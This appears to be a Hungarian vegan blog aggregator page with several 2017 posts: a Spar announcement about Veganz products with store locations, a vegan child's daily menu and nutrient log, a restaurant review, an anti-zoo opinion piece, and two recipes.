3.5.3226 ***** A zöldfűszeres mártás alapport a {Spar Magyarország} biztosította a recepthez. A véleményem csakis a sajátom.
Hol vásárolhatod meg a Spar újonnan bevezetett, vegán termékcsaládját, a Veganz termékeket?
2017. szeptember 26. VegaNinja
A magyar SPAR üzletlánc a növényi alapú, német Veganz márka nasijaival és más vegán termékeivel rukkolt elő. A több mint 60 különféle termék között olyan finomságok találhatóak, mint a bio növényi tejek, természetes édesítők, különféle magkrémek, magas fehérjetartalmú proteinporok, valamint az utánozhatatlan csokik és kekszek. Az üzletek listája, ahol megvásárolhatod őket, a kattintás után! A termékek nem olcsók, de az ember néha megjutalmazhatja magát egy-egy finomsággal, például a verhetetlen csokijaikkal és kekszeikkel, amik nekem is a kedvenceim közé tartoznak. “Egyre nagyobb az igény a növényi alapú ételek iránt, miután egyre többen választják a növényi alapú életmódot. A kezdetek óta kiemelt jelentőséget tulajdonítunk az egészséges életmód népszerűsítésének, amelyeknek legfontosabb eleme a tudatos táplálkozás. Ezért a nyugat-európai trendnek megfelelően folyamatosan bővítjük az egészséges életformát támogató termékeink választékát - mondta Maczelka Márk, a SPAR kommunikációs vezetője. A Veganz a növényi alapú élelmiszerek márkája. A 2011-es berlini alapítást követően a vállalat Európa egyik legelső vegán áruházláncaként vált ismertté. Sokszínű és életigenlő vállalati filozófiájával a fiatal cégnek sikerült megváltoztatni a vegánságra vonatkozó előítéleteket, és meghonosítani az európai piacon az új táplálkozási trendet. A Veganz folyamatosan bővülő árupalettája garantálja, hogy mindenki megtalálja a kedvére valót. A vállalat különösen nagy hangsúlyt fektet a minőségellenőrzésre, az egyenletesen jó minőségre és egyedülálló ízre. Így válik mindenki számára a vegán életmód és életérzés könnyűvé, rendkívül finommá, illetve könnyedén megvalósíthatóvá. A SPAR a Veganz növényi eredetű termékeit kínálva egyszerűbbé teszi a vegán táplálkozást. A több mint 60 különféle termék között olyan finomságok találhatóak a SPAR dedikált üzleteiben, mint az organikus növényi tejek, természetes édesítők, magas ásványi anyag tartalmú magkrémek, magas fehérjetartalmú proteinporok, valamint változatos édes és sós nassolnivalók. A termékcsalád tagjai 2017. szeptember 21-től elérhetőek minden INTERSPAR hipermarketben és 90 kijelölt SPAR és City SPAR szupermarketben. 1032 Budapest Bécsi út 154. INTERSPAR hipermarket 1103 Budapest Sibrik Miklós út 30. INTERSPAR hipermarket 1106 Budapest Kerepesi út 61. INTERSPAR hipermarket 1117 Budapest Október huszonharmadika utca. 8-10. INTERSPAR hipermarket 1191 Budapest Üllői út 201. INTERSPAR hipermarket 1201 Budapest Széchenyi utca 1. INTERSPAR hipermarket 2000 Szentendre Dobogókői út 4. INTERSPAR hipermarket 2030 Érd Iparos utca 5. INTERSPAR hipermarket 2049 Diósd Balatoni út 2/A INTERSPAR hipermarket 2400 Dunaújváros Béke körút 2. INTERSPAR hipermarket 2800 Tatabánya Győri út 25. INTERSPAR hipermarket 3524 Miskolc Bajcsy-Zsilinszky út 2-4. INTERSPAR hipermarket 3600 Ózd Sárli út 4. INTERSPAR hipermarket 4032 Debrecen Füredi út 27. INTERSPAR hipermarket 4400 Nyíregyháza László utca 8. INTERSPAR hipermarket 4400 Nyíregyháza Korányi Frigyes utca INTERSPAR hipermarket 5000 Szolnok Mátyás Király út 29. INTERSPAR hipermarket 5700 Gyula Kétegyházi út 1. INTERSPAR hipermarket 6800 Hódmezővásárhely Kaszap utca 20. INTERSPAR hipermarket 7100 Szekszárd Tartsay utca 9. INTERSPAR hipermarket 7632 Pécs Siklósi út 37. INTERSPAR hipermarket 7632 Pécs Bajcsy-Zsilinszky út 11. INTERSPAR hipermarket 8000 Székesfehérvár Budai út 41. INTERSPAR hipermarket 8000 Székesfehérvár Balatoni út 44-46. INTERSPAR hipermarket 8200 Veszprém Dornyai Béla utca 4. INTERSPAR hipermarket 8360 Keszthely Tapolcai út 37. INTERSPAR hipermarket 8500 Pápa Celli út 21. INTERSPAR hipermarket 8800 Nagykanizsa Táborhely utca 4. INTERSPAR hipermarket 8900 Zalaegerszeg Ola utca 1. INTERSPAR hipermarket 9023 Győr Fehérvári út 3. INTERSPAR hipermarket 9027 Győr ECE Budai út 1. INTERSPAR hipermarket 9400 Sopron Selmeci utca 15-17. INTERSPAR hipermarket 9700 Szombathely Újvilág utca INTERSPAR hipermarket BUDAPEST: 1011 Budapest Batthyány tér 5-6. SPAR szupermarket 1021 Budapest Hűvösvölgyi út 138. SPAR szupermarket 1024 Budapest Lövőház utca 2-6. SPAR szupermarket 1025 Budapest Rózsadomb Center, Törökvész út 87-91. SPAR szupermarket 1026 Budapest Gábor Áron utca 74-78. SPAR szupermarket 1031 Budapest Monostori út 3. SPAR szupermarket 1032 Budapest Bécsi út 136. SPAR szupermarket 1046 Budapest Görgey Artúr út 22. SPAR szupermarket 1048 Budapest Megyeri út 236. SPAR szupermarket 1062 Budapest Váci út 1-3. SPAR szupermarket 1066 Budapest Teréz körút 28. SPAR szupermarket 1066 Budapest Nyugati tér 1-2. SPAR szupermarket 1071 Budapest Dembinszky utca 12. SPAR szupermarket 1072 Budapest Klauzál tér 11. SPAR szupermarket 1073 Budapest Erzsébet körút 24. City SPAR szupermarket 1085 Budapest Blaha Lujza tér 1-2. SPAR szupermarket 1095 Budapest Mester u. 30-32. SPAR szupermarket 1106 Budapest Kerepesi út 73. SPAR szupermarket 1112 Budapest Péterhegyi lejtő 36. SPAR szupermarket 1118 Budapest Rétköz utca 7. SPAR szupermarket 1123 Budapest MOM Park, Alkotás utca 53. SPAR szupermarket 1146 Budapest Egressy út 178/C SPAR szupermarket 1148 Budapest Örs Vezér tere 24. SPAR szupermarket 1165 Budapest Arany János utca 102. SPAR szupermarket 1172 Budapest Jászapáti utca 71-75. SPAR szupermarket 1173 Budapest Pesti út 169. SPAR szupermarket 1173 Budapest Maroshévíz utca 1. SPAR szupermarket 1182 Budapest Alacskai út 3. SPAR szupermarket 1182 Budapest Cziffra György utca 15/b. SPAR szupermarket 1212 Budapest Görgey Artúr tér 20. SPAR szupermarket VIDÉK: 2000 Szentendre Ady Endre utca 24. SPAR szupermarket 2000 Szentendre Dunakanyar körút 2. SPAR szupermarket 2013 Pomáz Huszár utca 25. SPAR szupermarket 2030 Érd Diósdi út 46. SPAR szupermarket 2083 Solymár Terstyánszky Ödön utca 102. SPAR szupermarket 2092 Budakeszi Márity László út 20. SPAR szupermarket 2100 Gödöllő Köztársaság út 85. SPAR szupermarket 2112 Veresegyház Gödöllői út 2/a. SPAR szupermarket 2120 Dunakeszi Barátság útja 13. SPAR szupermarket 2120 Dunakeszi Toldi Miklós utca 1. SPAR szupermarket 2131 Göd Pesti út 176. SPAR szupermarket 2230 Gyömrő Kossuth út 41/a. SPAR szupermarket 2234 Maglód Damjanich utca 29. SPAR szupermarket 2364 Ócsa Szabadság tér 1. SPAR szupermarket 2481 Velence Tópart utca 47. SPAR szupermarket 2483 Gárdony Szabadság út 2392/I. SPAR szupermarket 2483 Gárdony Balatoni út 70/10. hrsz. SPAR szupermarket 2510 Dorog Bányász körönd 1737/16. hrsz. SPAR szupermarket 2536 Nyergesújfalu Kossuth Lajos utca 1439/6. hrsz. SPAR szupermarket 2600 Vác Avar utca 6. SPAR szupermarket 2800 Tatabánya Szent Borbála út 33/1. SPAR szupermarket 2870 Kisbér Kossuth Lajos utca 4/6. SPAR szupermarket 2890 Tata Ady Endre utca 20. SPAR szupermarket 2900 Komárom Klapka György út 69. SPAR szupermarket 3060 Pásztó Fő utca 83-87. SPAR szupermarket 3200 Gyöngyös Dobó István utca 5. SPAR szupermarket 3300 Eger Sas utca 1. SPAR szupermarket 3360 Heves Fő út 48. SPAR szupermarket 3390 Füzesabony Hunyadi út 2869/27. hrsz. SPAR szupermarket 3860 Encs Petőfi út 66. SPAR szupermarket 4024 Debrecen Fórum Csapó utca 30. SPAR szupermarket 4225 Debrecen-Józsa Szentgyörfalvi út 26420/1. hrsz. SPAR szupermarket 6000 Kecskemét Március 15-e utca 5/a. SPAR szupermarket 6050 Lajosmizse Dózsa György út 20-22. SPAR szupermarket 6060 Tiszakécske Vízhányó János utca 2/a. SPAR szupermarket 6100 Kiskunfélegyháza Béke tér 3-4. SPAR szupermarket 6724 Szeged Londoni körút 3. SPAR szupermarket 7400 Kaposvár Honvéd utca 57. SPAR szupermarket 7400 Kaposvár Berzsenyi utca 1-3. SPAR szupermarket 7761 Kozármisleny Vadvirág utca 1. SPAR szupermarket 8000 Székesfehérvár Pozsonyi út 10. SPAR szupermarket 8000 Székesfehérvár Rákóczi utca 3-5. SPAR szupermarket 8200 Veszprém Cserhát lakótelep 6. SPAR szupermarket 8230 Balatonfüred Arácsi út 15. SPAR szupermarket 8330 Sümeg 84-es főút 1623/10 hrsz. SPAR szupermarket 8440 Herend Vasút utca 1/c. SPAR szupermarket 8622 Szántód Siófoki út 3. SPAR szupermarket 8868 Letenye Kossuth Lajos utca 2. SPAR szupermarket 8960 Lenti Kisfaludy utca 4. SPAR szupermarket 9021 Győr Arany János utca 16. SPAR szupermarket 9200 Mosonmagyaróvár Régi Vámház tér 5. SPAR szupermarket 9200 Mosonmagyaróvár Aranyossziget utca 1. SPAR szupermarket 9330 Kapuvár Fő tér 2/2. SPAR szupermarket 9330 Kapuvár Győri út 1480. hrsz. SPAR szupermarket 9400 Sopron Arany János utca 16. SPAR szupermarket 9443 Petőháza Spar út 1. SPAR szupermarket 9500 Celldömölk Sági utca 22. SPAR szupermarket 9600 Sárvár Laktanya utca 32-44. SPAR szupermarket 9800 Vasvár Alkotmány utca 95. SPAR szupermarket 9900 Körmend Rákóczi út 2/C. SPAR szupermarket The post Hol vásárolhatod meg a Spar újonnan bevezetett, vegán termékcsaládját, a Veganz termékeket? appeared first on VegaNinja.
Mit eszik a vegagyerek? (napi teljes menü + tápanyag bevitel kalkuláció)
2017. szeptember 18. Zizi kalandjai
Sokszor kapom meg a kérdést aggódó szülőktől, a vegán étrend iránt érdeklődőktől, hogy honnan tudom, hogy a gyermekeim elegendő tápanyagot visznek-e be és vajon mindenből megkapják-e a megfelelő mennyiséget, jut-e elég fehérje, kálcium, magnézium, vas, szelén, cink, A-vitamin, C-vitamin, stb. a szervezetükbe. Ezekre a kérdésekre mindig az a válaszom, hogy ezek miatt egyáltalán nem aggódom. Igyekszem tudatosan odafigyelve összeállítani az étrendünket, ez alapján főzni, sütni, de egy idő után ez már napi rutinná válik, olyanná, mint az autóvezetés vagy a biciklizés. Segítségünkre lehet a kalória, a vitamin és ásványi anyag bevitel számolásában a Cronometer nevű weboldal, amelynek ingyenes részét használva naponta ki tudjuk számolni, hogy miből mennyit fogyasztottunk. Persze nem kell ezt napi szinten csinálni, hogy belezavarodjunk a végére… – de megnyugtatás képpen vagy az aggódó családtagok miatt havi egy-két alkalommal tesztelhetjük magunkat, hogy megfelelő mennyiségű tápanyagot vittek-e be a gyermekeink vagy akár mi. Az alábbiakban bemutatom nektek fényképeken keresztül, hogy mit ettünk egy teljes napon át, a bejegyzés végén pedig a Cronometerbe felvitt adatokat és az azokból számolt tápanyag mennyiségeket láthatjátok, hogy egy 4 éves, 18 kg súlyú és 110 cm magas gyermek miből mennyit evett/ivott. Persze a számolt értékek nem tekinthetők 100%-os eredménynek, mert ugye csak kb. saccolt mennyiségeket vittem fel az egyes élelmiszerekből, meg például savanyú káposzta esetében egy adott amerikai márkájú termékből számolt adatokat a rendszer. Mindenesetre egy hozzávetőleges támpontot nyújt az eredmény. Egy ilyen számolás segítségünkre lehet akár egy teljes heti menü előre tervezéséhez is. Természetesen minden étel vegán, nem tartalmaz semmilyen állati eredetű összetevőt! Reggeli: egy alma és epres turmix hántolt kendermaggal megszórva Cukifej Ízlik a reggeli “múti”… az utolsó cseppig megiszom! Most már tényleg semmi nem maradt a turmix tartályában! “Anya, ez olyan finom!” (Költözködős kupi a háttérben… bocs! ) Ebéd: pirított fokhagymás füstölt tofu, pirított fokhagymás-citromos leveleskel, főtt rizs és bulgur, citromos tahini szósz Délutáni snack no. 1.: egy alma Délutáni snack no. 2.: nagyon finom, édes sárgadinnye… Bratyók osztoznak a sárgadinnyén! Délutáni snack no. 3.: almaszeletek kesudióvajba mártogatva Délutáni snack no. 4.: friss málna a parkban Vacsora: humuszos kovászos kenyér (Pipacs Pékség), savanyú káposzta, koktélparadicsom, újhagyma, uborka, ebédről maradék tofu és leveleskel (nincs a képen még egy szelet kenyér, ami guacamoléval – avokádókrém – volt megkenve) És akkor íme az eredmény… Magyarázat : Vitaminokból (a D- és az E-vitamin kivételével) túlteljesítettük a 100%-ot. Ásványi anyagok egy részéből is többet vittünk be, amiből kevesebbet az a vas, a magnézium, a cink (ezekből 92%-nyit) és a kálium (ebből 47%-nyit, tehát több almát és banánt kell enni másnap, hogy ezt pótoljuk ). A nátriumot pedig jóval túlteljesítettük a napi átlagnál, de ez betudható a savanyú káposztának… ti ezen a képen nem látjátok, de egyénileg kimutatja a rendszer, hogy pl. a 264% nátrium miből jött össze és látom, hogy a savanyú káposztában található nátrium mennyiséget igen magasra értékeli. Viszont a bevitt C-vitamin mennyiség legnagyobb része a savanyú káposztából származik, tehát jó sok C-vitamin került a szervezetbe a káposztából, viszont ezzel egyidőben jó sok nátrium is. Amit biztosan félre kalkulált a rendszer, az a 0.1 g transzzsír. Mi is az a transzzsír? “A transzzsírsavak a növényi olajok hidrogénezése során keletkező vegyületek. A kutatások kimutatják, hogy a természetben, természetes formában előforduló transzzsírsav nem okoz olyan egészségügyi kockázatot, mint a mesterséges úton előállított társai.” Megnéztem és a rendszer az 1 evőkanálnyi tahinit rakta be a zsiradékok közül a transzzsírhoz (is). Utána néztem és a nyersen krémmé darált szezámmag nem tartalmaz egészségtelen transzzsírt, szóval nem tudom miért került a Cronometer szerint ide. De ezt leszámítva, azt hiszem, hogy elégedett lehetek a végeredménnyel, mert egy vitaminokban, ásványi anyagokban, egészséges zsiradékokban (Omega-3 és Omega-6), fehérjében gazdag (!!!) napon vagyunk túl. Persze azt is figyelembe kell venni, hogy minden nap más és más és egyik nap C-vitaminból viszünk be többet a szervezetünkbe az elfogyasztott ételekkel, másik nap meg vasból. A cél, hogy törekedjünk a harmóniára, a kigyensúlyozott táplálkozásra minden nap!
Vegán gúrméskodás a Great Bistro-ban
2017. augusztus 18. Vegán lettem
Stőhr Gréta – a Great Bistro megálmodója, tulajdonosa és séfje – mert nagyot álmodni, és elhozta a növényi étrendesek világába a nagybetűs Gourmet fogalmát. Hiánypótlás mesterfokon! Jómagamat nem tartom gúrméfigurának, sőt inkább jellemző rám a mennyiségi mint a minőségi táplálkozás. A reggeli és esti zab valamint turmixhegyek, az ebédre összepattintott fél órás levesek, és egyszerűbb főételek dimenziójából havonta egyszer-kétszer kilépek és elmegyek feleségemmel vacsorázni. Olyan helyeket látogatunk, ahol általunk nehezebben elkészíthető fogásokat ehetünk. Számos, nagyon jó vegán étterem és kajás hely van Budapesten, de itt most valami egészen más született. Valami olyan, ami eddig még nem volt, valami tökéletes hiánypótló. Élményeim a Great Bistro-ban: Még márciusban láttak Grétáék vendégül egy degusztációs fine dining vacsorára. Illetve ne szaladjunk ennyire előre, mert csak egy vacsorára voltam hivatalos, és a franc sem gondolta, hogy Magyarország első 100%-ban növényi és gluténmentes fine dining vacsora beharangozójába és próba vacsorájába csöppenek. De így történt és totálisan el voltam ragadtatva. Először a menüsort kaptam készhez, amelyből ugyan néhány szó értelmezésével gondban voltam, viszont a felsorolás nagyon kecsegtetően hangzott. Majd következett a négyfogásos vacsora, az ízorgia pedig fogásról fogásra fokozódott és azt hittem, hogy egyenesen a mennybe kerültem. A menü egy előételből, egy levesből, egy főételből és egy csodálatos desszert válogatásból állt. Előétel Előételként marinált karotta lazac-ot szolgáltak fel remoulade mártással. A lazac-ot répával helyettesítették, amely a 24 órás pácolási folyamat hatására, mind állagában mind ízében szemtelenül hasonlított az igazi lazacra. Emellett a mártás olyan összhangot dobott a már számomra önmagában is kielégítő répaszeletekhez, amilyet addig csak nagyon kevés helyen éreztem. Leves A leves citrusos-joghurtos zellekrémleves volt. Felnőtt fejjel nagyon leveses lettem - kiváltképpen nagyon szeretem a krémleveseket -, így ezt a fogást kifejezetten vártam. Még ennyi idő után is emlékszem, ahogy minden egyes kanálnál a citrusos íz mennyire finoman kúszott végig az ízlelőbimbóimon. Tökéletesen kiegyensúlyozott volt a citrusos jelenlét a zelleres, fűszeres és joghurtos ízek kavalkádjában. Főétel Főételnek aszalt paradicsomos, édesburgonyás gnocchit szolgáltak fel parmezánropogóssal. A gnocchi - nagypapám csak lenudlizta, pedig a gnocchi mennyivel jobban cseng - ugyancsak egyik kedvenc ételem. Így ugyancsak szinte már fájdalmasnak mondható várakozással telt a leves és főétel között eltelt 4-5 perc, amíg Gréta pár szóban felvezette a következő fogást. Az előétel és a leves után ezen a ponton éreztem egy kicsi űrt. Szakmailag belekötni nem tudok és nem is a célom, ugyanakkor számomra ez az ízvilág nem adott többet, mint egy komolyabb étterem gnocchis fogása. Hozzáteszem, hogy legjobb tudomásom szerint nincs olyan vegán étterem ahol gluténmentes gnocchi-t lehet kapni. Desszert No és akkor jött a korona, a csúcs, a hovatovább, a nonplusultra, a desszert. Pisztáciába, kókuszpehelybe, aszalt áfonyába forgatott álomgombóc válogatás narancsvirágvízes joghurtöntettel, céklás-csokoládés brownie és mangós tiramisu. Ez milyen sor? Megnyílott a mennyek kapuja? Meg! Sorrendet állítani csak olyan formán tudtam a desszertek között, hogy melyik alapanyagot szeretem kevésbé. A csokoládés sütiket annyira nem csípem, így a brownie került leghátra úgy, hogy amikor megkóstoltam kis híján felkiáltottam örömömben. A céklás beütés annyira tökéletesen egészítette ki a tömény csokoládé ízét, hogy szóhoz sem jutottam. Az aranyérmet holtversenyben az álomgombóc válogatás kapta, kontra mangós tiramisu. A mangós tiramisu és a különböző köntösbe öltöztetett golyócskák a tökéletesség határát súrolták nálam. Ha nem tudnám, hogy mindennél lehet finomabbat készíteni, akkor ott leadtam volna a 10 pontot. Így csak 9,999 pontot tudtam adni a desszertekre. Is. Összességében számomra egy olyan élményt adott ez a vacsora, amelyet nem tudom ki, mikor, hol és mivel tud majd überelni. A vacsora hangulatát csak tovább emelte a Great Bistro barátságos és családias közege, valamint Gréta és Ákos minőségi és valódi jelenléte. Grétáék egyébként rendszeressé tették fine dining vacsoráikat a Great Bistro-ban minden szerda, csütörtök, péntek és szombat este. Sok sikert kívánok a versenytársaknak, hisz ahogy a bevezetőben írtam, Grétáék valami olyat tettek le az asztalra, ami ezeddig Magyarországon egyedülálló. De bármely európai, tisztán növényi ételeket felszolgáló étterme mellé odaállítanám őket bátran. Nagy büszkeség, hogy ennyire erősödünk növényi kaja fronton, mindenkinek nagy szeretettel ajánlom a Great Bistro-t. Nyitvatartás: Hétfő és kedd: 8:00 és 18:00 között nyitva. Szerdától péntekig: 8:00 és 22:00 között nyitva. Szombaton: 12:00 és 22:00 között nyitva. Vasárnap: zárva Cím: 1054 Budapest, Bank utca 6. A Great Bistro weboldala és facebook oldala.
A jövő állatkertje – 7D hologramos állatok Japánban?
Nemrég egy érdekes videó kezdett el terjedni a neten: a cím szerint egy új japán állatkertben vették fel, ahol vadi új 7D technikával jelenítik meg a hologram állatokat, akiket nem csak látni, de tapintani is lehet, és a látogatók még az állatok szagát is érzik. A kattintás után megnézheted a videót! A fenti videó sajnos hoax, azaz nem létezik ez a varázslatos japán hologram-állatkert. A videó valójában a National Geographic kampánya volt, az úgynevezett augmetned reality (kiterjesztett valóság) technikát használva egy képernyőn önmagát láthatta a közönség, és ezen kívül a 3D állatokat, akik az emberek mozgására reagáltak. Ha játszottál a Pokemon GO-val, akkor ismered az augmented realityt. Az alábbi videóval, amit ráadásul a budapesti Allee-ban vettek fel, könnyebb lesz elképzelni, hogyan működik. Azért meg kell, hogy mondjam, nagyon reménykedtem, hogy a hír igaz. Az állatkert egy borzalmas és kegyetlen hely az állatok számára. Mindannyian láttunk olyan fotókat állatkerti állatokról szerte a világból, amin elfacsarodott a szívünk. Soványak, megtörtek, hiányos a szőrük, és a szemükben már nincs fény. Nézd meg a galériát: Kattints ide a diavetítéshez. Elmondhatjuk, hogy a magyarországi állatkertekben valószínűleg ennyire nem néznek ki rosszul az állatok. De azt senki nem gondolhatja komolyan, hogy egy gorillának így kellene élnie: A gorillák csapatban élnek, és csapatonként kb. 40 négyzetkilométeres (!) territóriummal rendelkeznek a vadonban. Ehhez képest sehol sincs még egy viszonylag nagy állatkerti kifutó sem. A vadállatok óriási távolságokat tesznek meg egy-egy nap alatt, feladatokat oldanak meg, élelmet keresnek, és igen, gyakran menekülnek is. Képzeljünk el egy sportolót, akit az orvosa eltilt a mozgástól. Őrjítő dolog. Most képzeljük el, hogy ugyanez a sportoló egy 100 négyzetméteres lakásba van bezárva. Persze, a gyerekek szeretnek állatkertbe menni. Szeretik az állatokat, érdekli őket, hogyan néznek ki élőben, és nyilván nem tűnik fel nekik, ami nekünk, felnőtteknek már igen, hogy a nagymacskák és a farkasok csak oda-vissza cikáznak a rács mögött, hogy dülöngél az elefánt az őrülettől… Megszoktuk, hogy úgy tekintünk az állatokra, mint alsóbbrendű lényekre, akiket legyőztünk, és nem érdemlik meg, hogy a saját életük felett rendelkezzenek. De ezt a megszokást meg kell kérdőjeleznünk, ha szeretnénk egy jobb világot gyerekeinknek. Empátiával kell fordulnunk feléjük, akár beleképzelni magunkat a helyükbe, és be kell látnunk, hogy ezeket az állatokat börtönbe zártuk, pedig nem követtek el bűnt. A kis zsiráf megkérdezi az anyukáját: – Anya, miért ilyen hosszúak a szempilláim? – Hogy a szaharai homok ne menjen a gyönyörű szemeidbe, drágám. – És anya, miért vannak paták a lábaim végén? – Az pedig azért, hogy a forró homok ne égesse a talpacskáidat. – És a nyelvem meg a nyakam miért ilyen hosszú, anya? – Hát azért, hogy a nagy szárazságban azokat a leveleket is elérd, amik más állatok számára túl magasan vannak. – Akkor csak egyet nem értek: mit keresünk a Budapesti Állatkertben? A régi vicc inkább szomorú, mint vicces. Ők nem tartoznak erre az égtájra, nem erre fejlődtek ki az evolúció során. Ez is csak egy olyan dolog, amit mindenki tud, mégis nagyon kevesen kérdőjelezik meg azt, hogy vajon jól van-e ez így. Az érvek között szerepel, hogy szegény gyerek hogyan lásson állatokat, ha nem így? Vajon a dinókért miért rajong egy csomó gyerek? Sosem látott ma élő ember valódi dinoszauruszt, mégis sok gyerek (és persze felnőtt) óriási lexikális tudással rendelkeznek róluk. Ehhez nem kellenek élő állatok. Azzal nem tudok vitatkozni, hogy a gyerekek és állatok között létrejövő kapcsolat szinte minden esetben megváltoztatja a gyerek életét. Ámulattal tölti el őt az állat látványa, érintése, közelsége. Figyelni az állatot, amint teszi a dolgát, éli az életét: egy igazi csoda. De ilyen tapasztalatot nem kap az állatkertben, ott az állatok viselkedése sem természetes. Nézzünk természetfilmet, vagy menjünk el túrázni egy erdőbe, figyeljük meg a közelünkben élő madarakat, vagy ha mindenképp egzotikus állatot szeretnénk látni, keressünk egy menhelyet. Például a Noé Állatotthon lakói nem a profit miatt élnek ott, hanem mert valamiért nem engedhetők vissza a vadonba, ideiglenesen vagy véglegesen. Noé Állatotthon Azzal is szeretjük magunkat áltatni, hogy az állatkertek valamiféle megmentő szerepet töltenek be az állatvilágban. Ez is hazugság. Az állatkertek a profit miatt jöttek létre, a belépőjegy-vásárlások és esetleges állami támogatások tartják fent őket, ugyanolyan profitorientált intézmények, mint egy vidámpark vagy plázamozi, csak épp élő áldozatai (rabjai) vannak. Ha jegyet veszünk, további állatok befogását, szaporítását és rabosítását támogatjuk a pénzünkkel. A zsiráfokat és az orrszarvúkat nem Európa közepén kell megmenteni, ezt szerintem nem kell magyaráznom. Ez csak egy ocsmány PR fogás az állatkertek részéről, elég csak megnézni az elmúlt években, állatkertekben kilőtt vagy más módon megölt állatokat. Az oroszlánsimogató parkok egy más kategória – sajnos nem a jó okokból. Itt írtunk róla, hogy hogyan ölik meg a szelídített oroszlánokat, akiket jóhiszemű önkéntesekkel nevelnek fel. Általános állatvédelmi “szabály”, hogy ha egy tevékenységben szerepet játszik a pénz és az állatok, akkor az szinte kivétel nélkül azt jelenti, hogy az állatok kihasználásáról van szó. Itt olvashatsz a szórakoztatóipari állatokról bővebben. Ahogy a Vegán Állatvédelem Egysület mottója mondja: Az állatok nem értünk vannak itt, hanem velünk. A saját életük, biztonságuk és szabadságuk a legfontosabb számukra, ahogy számunkra is. Menekülnek, vigyáznak magukra, vigyáznak egymásra. Nem tehetjük meg velük azt a rengeteg borzalmat tiszta lelkiismerettel, amit ma teszünk velük. Jobbat érdemelnek. Szívből remélem, hogy a hologram állatkert hamarosan valóság lesz, és egy nap nem kell állatkertbe születnie egyetlen állatnak sem csak azért, hogy gyerekeket szórakoztasson. The post A jövő állatkertje – 7D hologramos állatok Japánban? appeared first on VegaNinja.
Töltött paprika húsmentesen
2017. július 30. Éltető ételek
Egyre jobban teret hódítanak az olyan ételek, ahol a a húst növényi alapanyagokra cserélik. Persze egy az egyben nem lehet azt mondani, hogy ez teljesen olyan lesz, mint a húsos változat.... szerintem még finomabb. :) Nem olyan nehéz, hiszen nincs benne hús, de a magyaros íz a paradicsomos mártással csodásan érvényesül. És tudod, mi a különleges ebben az ételben? Az, hogy a húst alakorral helyettesítettem. Nem szójával, nem szejtánnal és nem is gombával. Hihetetlen, de ha jól eltalálod a fűszerezést, akkor egy nagyon finom főétel lesz belőle. Hozzávalók: - 20 dkg alakor búza - 20 dkg parbolied rizs - 1 bio vagy házi tojás - 2 vöröshagyma - 2-3 gerezd fokhagyma - 3 evőkanál kókuszolaj - 2 teáskanál pirospaprika - só, bors - 6-8 db tölteni való paprika Paradicsomos mártás: - 0,5 kg friss paradicsom - 1 doboz sűrített paradicsom (Lidl-ben szoktam venni, dobozos) - 1 teáskanál méz - só, bors - 5-6 dl víz - 3 evőkanál kukoricaliszt - 2 evőkanál kókuszolaj Elkészítése: - Az alakor búzát 8 órára vagy akár egy egész éjszakára áztasd be. Másnap öblítsd le, majd 1 óra alatt, lassú lángon főzd puhára (kb. 3 csésze vizet önts rá, de főzés közben ellenőrizd, hogy ne ragadjon le.). 1 teáskanál sót tegyél a főzővízbe. - Közben a rizst 2 csésze vízben, mintegy 30 perc alatt főzd meg (ebbe is tegyél 1 teáskanál sót). - Az apró kockára vágott vöröshagymát a kókuszolajon dinszteld meg. - A búzáról öntsd le a felesleges főzővizet, majd húsdarálóval vagy botmixerrel daráld meg. - Keverd hozzá a megfőtt rizst, a tojást, a megdinsztelt hagymát (az olajjal együtt), a tojást, a fűszereket és reszeld bele a fokhagymát is. Jól keverd össze, az ízeket ellenőrizd! - A paprika tetejét vágd le, szedd ki belőle a magházát. Töltsd meg az elkészített töltelékkel. - Paradicsomos mártás készítése: Hevítsd fel a kókuszolajat, majd tedd vele a kis kockára vágott paradicsomot. Süsd össze, majd öntsd rá a sűrített paradicsomot és a vizet. Csorgasd bele a mézet, fűszerezd. Kb. 5 percig rotyogtasd, majd helyezd bele a paprikákat. A paradicsomos lé majdnem lepje el a paprikákat. Tepsibe is sorakoztathatod a töltött paprikákat, és erre öntsd rá az elkészült híg mártást. - Mintegy 30-40 percig lassú lángon főzd, amíg a paprika héja megpuhul. Ekkor szedd ki a paprikákat, és a megmaradt paradicsomos mártást szűrd át (mivel került bele friss paradicsom is). - Folyamatos keverés mellett (kézi habverővel) szórd bele a kukoricalisztet. Ettől lesz egy selymes, lágy mártásod. Ha szükséges, kicsi vízzel hígíthatod.Kockára vágott, főtt krumplit kínálhatsz hozzá.
Khir (indiai édesrizs)
2017. július 25. Élj harmóniában
Rizs Khir (indiai édesrizs) Ha már a minap kitettem a tejfogyasztás ősi, ájurvédikus megközelítését (itt olvashatod), gondoltam stílusosan egy tradicionális tejes édesség receptet is kiteszek a blogra. Az indiai konyhában általában a desszerteket a főétkezés részeként szolgálják fel, nem pedig külön a legvégén. Ájurvédikus szempontból az étkezés végén fogyasztott édesség székrekedést okozhat. Az édességeket leginkább vallási és családi ünnepségekre készítik. Az indiai khir egy folyós édesség, amit általában kardamommal vagy sáfránnyal készítenek el. Fenti fűszerek ellensúlyozzák a tejes édesség nyálkásító hatásait és ízletessé teszik az édességet. A khirhez gyakran tesznek manduladarabokat vagy pisztáciát Kapha típusúak csak ritkán fogyasszanak khir-t. Nagyon sokféle khir van (mandula, répa, datolya, etc.) . A legelterjedtebb a rizsből készített khír, magyarul édesrizs. Hozzávalók 1/4 csésze rövid szemű rizs 1 l friss teljes tej (nem homogenizált, nem ultra pasztörizált) 2 db egész kardamom 3/8 csésze teljes értékű barna nádcukor Vegyszermentes (bio) alapanyagokat használj! A rizst szűrőben alaposan mosd meg és csöpögtesd le. A kardamom hüvelyeket kicsit nyomkodd szét, hogy picit megnyíljon. A tejet és a kardamomot tedd egy vastag aljú edénybe és állandóan kevergetve forrald fel közepes lángon. Majd vedd takarékra a lángot és tedd hozzá a rizst. Forrald óvatosan kevergetve kb. 40 percig, amíg besűrűsödik. Amikor az édesrizs kicsit krémes és enyhén sűrű, de még folyós lesz akkor vedd le a tűzről. Vedd ki a kardamomokat és keverd hozzá a cukrot, majd hagyd kihűlni. A tetejét megszórhatod mandulaforgáccsal vagy pisztáciatörettel .
10 érdekes (és nagyon fura) összetevő, amitől nem lesz vegán-kompatibilis egy termék
